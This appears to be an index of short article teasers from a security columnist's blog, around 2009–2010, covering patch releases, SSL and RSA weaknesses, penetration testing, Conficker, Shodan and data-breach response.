Clarifying the technical findings on a weakness in RSA crypto keys and some recommendations on how to prepare and protect your assets from the next inevitable crypto weakness discovery

The hacker mindset can't be taught -- it must be developed and refined over time

How to pre-emptively secure systems against 0day attacks that, by definition, we know nothing about

Special care must be taken in a penetration test that locates targets with 'zero-knowledge'

Tips for helping family members secure their computers for safe internet browsing and online shopping.

Welcome to the first in a series of posts on professional penetration testing. During the course of the next few entries, I will shed light on the often confusing and rarely straightforward world of penetration testing based on my experience during the past decade as both a professional penetration tester and a manager of penetration testing teams.

During the Labor Day weekend, I got pulled in by friends and relatives (some remotely) to take care of their computer-related problems.

Adobe has published its security updates for Adobe Reader and Adobe Acrobat.

A couple of months ago, Secunia's Stefan Frei published a great paper about the patching burden that the average PC user faces every week.

Microsoft published Version 8 of its Security Intelligence Report (SIR) this week. The report covers the second half of 2009 and is a massive piece of information with almost 250 pages.

In the past two weeks we have seen multiple problems with SSL, which is used in our Web browsers to protect the privacy and integrity of our electronic transactions.

Multiple vulnerabilities in the mainstream browsers and other widely installed software came to light at the CanSecWest conference in Vancouver.

Along with the usual security alerts covering the March bulletins from Microsoft and various content management systems flaws, US CERT published an unusual security alert about a product from Energizer, the battery company.

In the past few weeks since the Google/China incident, we have seen a number of interesting blog posts and white papers that provide further details on some of the techniques used by the attackers.

Microsoft's February 2010 Patch Tuesday was one of the bigger releases for Microsoft and its clients in the past two years -- 13 bulletins addressing 26 vulnerabilities.

The latest update for Internet Explorer is out, and organizations are busy applying or at least certifying the patch on their testbeds.

A co-worker forwarded me an e-mail in which the original sender was asking about running vulnerability scans on his own and stated he was concerned about the scans causing downtime while the servers were being tested.

Next Tuesday, Jan. 12, is Microsoft Patch Tuesday. Beyond the usual patches from Microsoft, we will also get a critical update for a piece of software that increasingly plays a role in exploiting desktop systems -- the Adobe Reader from Adobe Systems.

Microsoft has made Office 2010 available in public beta. After playing around with it for a while, I am not yet sure I need any of the new functionality.

Security reports have consistently pointed out weak or default passwords as a major source for data breaches, similar to the recent Verizon Data Breach Study. Now there's a new service that tests the strength of passwords used in the encryption of wireless access points.

Last week saw the launch of Shodan, a search engine for machines (servers, routers, etc.) connected to the Internet.

Security professionals are intrigued by the fact that for approximately half of the data breach cases Verizon Business works, the victim doesn't realize there's a problem until more than six months after the incident occurred. Another stunning fact: More than two-thirds of incidents we work are discovered by a third-party.

I recently attended a presentation about the current state of the Conficker worm, delivered by Felix Leder and Tillman Werner, two German security researchers from the University of Bonn.

This week Microsoft published volume 7 of its Security Intelligence Report (SIR), covering January 2009 through June 2009.

I recently got back from a sizable IT security conference in London. As I've experienced countless times at shows, everyone was most intrigued by the war stories about organizations that were victims of a data breach. Security folks have an innate desire to learn what happened to others so they can prevent encountering the same fate -- or so they say. However, after personally investigating hundreds of data breaches for my clients, there seems to be a number of recurring themes that nobody seems to catch. One in particular is with respect to developing and maintaining an incident response plan.